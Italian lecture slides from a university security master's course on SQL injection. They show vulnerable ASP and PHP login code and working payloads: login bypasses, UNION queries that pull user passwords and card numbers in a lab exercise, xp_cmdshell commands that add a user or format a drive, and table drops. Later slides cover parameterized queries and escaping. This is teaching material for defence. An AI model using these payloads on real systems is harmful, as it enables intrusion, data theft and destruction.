UNIVERSITÀ DI PERUGIA
DIPARTIMENTO DI MATEMATICA E INFORMATICA
SQL Injection
Prof. Stefano Bistarelli
Università “G. d’Annunzio”
Dipartimento di Scienze, Pescara
C
Consiglio Nazionale delle
Ricerche
Iit
Istituto di Informatica e Telematica - Pisa
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Setup
User input usato in SQL query
esempio: login page (ASP)
set ok = execute(“SELECT * FROM UserTable
WHERE username=′ ” & form(“user”) &
“ ′ AND password=′ ” & form(“pwd”) & “ ′ ” );
If not ok.EOF
login success
else fail;
Quale e’ il problema?
S. Bistarelli - Metodologie di Secure
Programming
2
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Bad input
Supponiamo
user = “ ′ or 1 = 1 -- ”
Allora lo scripts ottiene:
ok = execute( SELECT …
WHERE username= ′ ′ or 1=1
(URL encoded)
-- … )
poiché è presente ‘- -’ il resto della linea è ignorato.
ora ok.EOF è sempre falso.
The bad news:
facile login a molti siti in questo modo.
S. Bistarelli - Metodologie di Secure
Programming
3
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Even worse
Supponiamo user =
′ exec cmdshell
′net user badguy badpwd′ / ADD --
Allora lo script:
ok = execute( SELECT …
WHERE username= ′ ′ exec …
)
se SQL server è eseguito da “sa” o “root”, attaccante ottiene
un account sul DB server.
S. Bistarelli - Metodologie di Secure
Programming
4
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Demonic strings 2
Remote execution
Get output
'; EXEC master..sp_makewebtask
"\\10.10.1.3\share\output.html", "SELECT * FROM
INFORMATION_SCHEMA.TABLES"
Insert data
'; exec master..xp_cmdshell 'ping 10.10.1.2'–
‘; UPDATE 'admin_login' SET 'password' = 'newpas5'
WHERE login_name='neo'–
Delete data|
';drop table users –
S. Bistarelli - Metodologie di Secure
Programming
5
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Demonic strings
' or 1=1-" or 1=1-or 1=1-' or 'a'='a
" or "a"="a
') or ('a'='a
S. Bistarelli - Metodologie di Secure
Programming
6
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Avoiding SQL injection
Due suggerimenti:
Query parametriche con parametri tipati e
controllati
Uso di store procedure parametrizzate
S. Bistarelli - Metodologie di Secure
Programming
7
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Query parametriche
Example: Parameterized SQL:
(ASP.NET 1.1)
Ensures SQL arguments are properly escaped.
SqlCommand cmd = new SqlCommand(
"SELECT * FROM UserTable WHERE
username = @User AND
password = @Pwd", dbConnection);
cmd.Parameters.Add("@User",
Request[“user”] );
cmd.Parameters.Add("@Pwd", Request[“pwd”]
);
S. Bistarelli - Metodologie di Secure
cmd.ExecuteReader();
Programming
8
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Prepare-execute procedure
pg_query($conn, “PREPARE stmt_name (text) AS
SELECT * FROM users WHERE name=$1”);
pg_query($conn, “EXECUTE stmt_name ({$name})”);
pg_query($conn, “DEALLOCATE stmt_name”);
S. Bistarelli - Metodologie di Secure
Programming
9
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Magic quotes e real-escape
Magic quotes
file di configurazione php.ini: voce
magic_quotes_gpc
funzione addslashes() o funzione
mysql_escape_string() su tutte le variabili inserite
in una query SQL.
Build SQL queries by properly escaping args: ′
\′
Nota: mysql escape = \
Firebird escape = ‘
S. Bistarelli - Metodologie di Secure
Programming
10
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
In genere
Controllare sempre l’input!!
Vediamo un esercizio
S. Bistarelli - Metodologie di Secure
Programming
11
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Fabrikam
Fabrikam has recently introduced a search
feature into their product database, but
they’ve written it with some rather naïve
code. Your first job will be to exploit the SQL
injection vulnerability so you understand the
implications. Then you’ll go on the defensive
and fix the problem.
S. Bistarelli - Metodologie di Secure
Programming
12
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
‘ or 1=1 –
‘ union select null –
Che tabelle nei vari db?
' union select null, column_name, null from
FabrikamSampleProductDatabase.information_schema.columns where
table_name='users' -
Che altri db ci sono?
‘ union select null, table_name, null from
FabrikamSampleProductDatabase.information_schema.tables -
Versione db! Per vulnerabilita’ conosciute
' union select null, name, null from sys.databases –
Ora troviamo il tipo dei campi
‘ union select null, @@version, null –
ok
‘ union select $0, null, null –
Numero campi query sbagliata
‘union select null, null –
Good!!
Bene che colonne interessanti!! Utenti!
' union select null,email+', '+password+', '+cc_type+', '+cc_num+', '+cc_exp+',
'+cc_vcode,null from Users -S. Bistarelli - Metodologie di Secure
Programming
13
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Some damage
' update products set price=.01 where
description='MP3 Player' -
Ora possiamo comprare l’mp3 player
' exec xp_cmdshell 'net user hacker
P@ssw0rd /add'
' exec xp_cmdshell 'format z:'
S. Bistarelli - Metodologie di Secure
Programming
14
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
Difesa!!
Filter input
searchString = txtSearch.Text;
searchString = txtSearch.Text.Replace("'","''");
sandbox the input data in a parameterized query
(visualizzazione progettazione, proprieta’ del selectcommand
select sku, description, price from Products where description like
@s order by price
Refresh!
dataSource.SelectCommand = string.Format(
"select sku, description, price from Products where
description like '%{0}%' order by price",
searchString);
dataSource.SelectParameters["s"].DefaultValue = '%' +
searchString + '%';
S. Bistarelli - Metodologie di Secure
Programming
15
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
cod1
if (isset($_POST['user']) && isset($_POST['passwd'])) {
include 'mainfile.php';
mysql_connect(DB_HOST, DB_USER, DB_PASS); // queste sono
le variabili definite nel file 'mainfile.php'
$result=mysql_db_query(DB_NAME,"select * from utenti where
username='$_POST[user]' and passwd='$_POST[passwd]'");
if (mysql_num_rows($result)!=0) {
$_SESSION['user']=$_POST['user'];
S. Bistarelli - Metodologie di Secure
Programming
16
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
cod2
if (isset($_POST['admin_password'])){
$pwd= $_POST['admin_password'];
if ((ereg("\=", $pwd))) //impedisce l'inserimento di alcuni caratteri
{
echo " <script type='text/javascript'> alert ('Hai utilizzato un carattere non valido') </script>";
session_destroy();
};
};
if (isset($_POST['admin_user']) && isset($_POST['admin_password'])) {
include '../connessione.php';
mysql_connect(DB_HOST, DB_USER, DB_PASS); // queste sono le variabili definite nel file 'connessione.php'
$result=mysql_db_query(DB_NAME,"select * from amministratore where admin_user='$_POST[admin_user]' and
admin_password='$_POST[admin_password]'");
if (mysql_num_rows($result)!=0) { $_SESSION['admin_user']=$_POST['admin_user'];
?>
<script type="text/javascript"> document.location="home_amministratore.php" </script>
S. Bistarelli - Metodologie di Secure
Programming
17
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
$nome_utente = $_POST['username'];
$password = sha1($_POST['password']);
$query="SELECT * FROM MANAGER WHERE
NOME_UTENTE='$nome_utente' AND PSWD='$password'";
$connessione = ibase_query(db_connect(),$query);
if($row=ibase_fetch_object($connessione))
{
$_SESSION['manager']='logged_in';
$_SESSION['facolta'] = $row->COD_FACOLTA;
header('Location: genera_cod_step1.php');
} else
{
$msg_login = "<div style='color: red;'>Nome utente e/o password
erra
ti!</div><br />";
}
S. Bistarelli - Metodologie di Secure
Programming
18
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
if (isset($_POST['pass']))
{
$pass=filtraggio($_POST['pass'],50);
$query=mysql_query("select * from
password where pwd=sha1('$pass')") or
mysql_showerror();
if ($n=mysql_num_rows($query) > 0)
{
$_SESSION['autenticato']=true;
S. Bistarelli - Metodologie di Secure
Programming
19
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
// funzione controllo SQL Injection per dati tipo stringa
function filtraggio($str,$val){
if ( get_magic_quotes_gpc()) {
$filtro = stripslashes($str);
$filtro1 =
mysql_real_escape_string(substr($filtro,0,$val));
}else
{
$filtro1 = mysql_real_escape_string(substr($str,0,$val));
}
return $filtro1;
}
S. Bistarelli - Metodologie di Secure
Programming
20
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
cod3
if (isset($_POST['pin'])){
$pwd= $_POST['pin'];
if ((ereg("\=", $pwd))) //impedisce l'inserimento di alcuni caratteri
{
echo " <script type='text/javascript'> alert ('Hai utilizzato un carattere non valido') </script>";
session_destroy();
};
};
if (isset($_POST['pin'])){
include 'connessione.php';
mysql_connect(DB_HOST, DB_USER, DB_PASS); // queste sono le variabili definite nel
file 'connessione.
php'
$result=mysql_db_query(DB_NAME,"select * from studenti where pin='$_POST[pin]'");
if (mysql_num_rows($result)!=0) { $_SESSION['pin']=$_POST['pin'];
S. Bistarelli - Metodologie di Secure
Programming
21
Master di I° livello in Sistemi e Tecnologie per la sicurezza dell'Informazione e della Comunicazione
function SQL_Injection(){
foreach ($_POST as $chiave => $elemento) {
// elimino i caratteri _ e % sensibili per la parola chiave LIKE
$_POST["$chiave"] = str_replace("%", "", $_POST["$chiave"]);
//sostituisco le parentesi angolari, onde evitare la creazione d
i codice html
$_POST["$chiave"] = str_replace("<", "<", $_POST["$chiave"]);
$_POST["$chiave"] = str_replace(">", ">", $_POST["$chiave"]);
//sostituisco ' con `
$_POST["$chiave"] = str_replace("'", "`", $_POST["$chiave"]);
//rimuovo gli spazi all'inizio e alla fine
$_POST["$chiave"] = trim($_POST["$chiave"]);
// se magic_quotes_gpc è disattivo, mi appoggio a mysql_real_esc
ape_string() contro attacco di tipo SQL Injection
//if ( !get_magic_quotes_gpc() ) {
// e quoto i caratteri \ " ' sensibili per php
//$_POST["$chiave"] = mysql_real_escape_string($_POST["$chiave"]);
//}
}
}
S. Bistarelli - Metodologie di Secure
Programming
22
Scarica
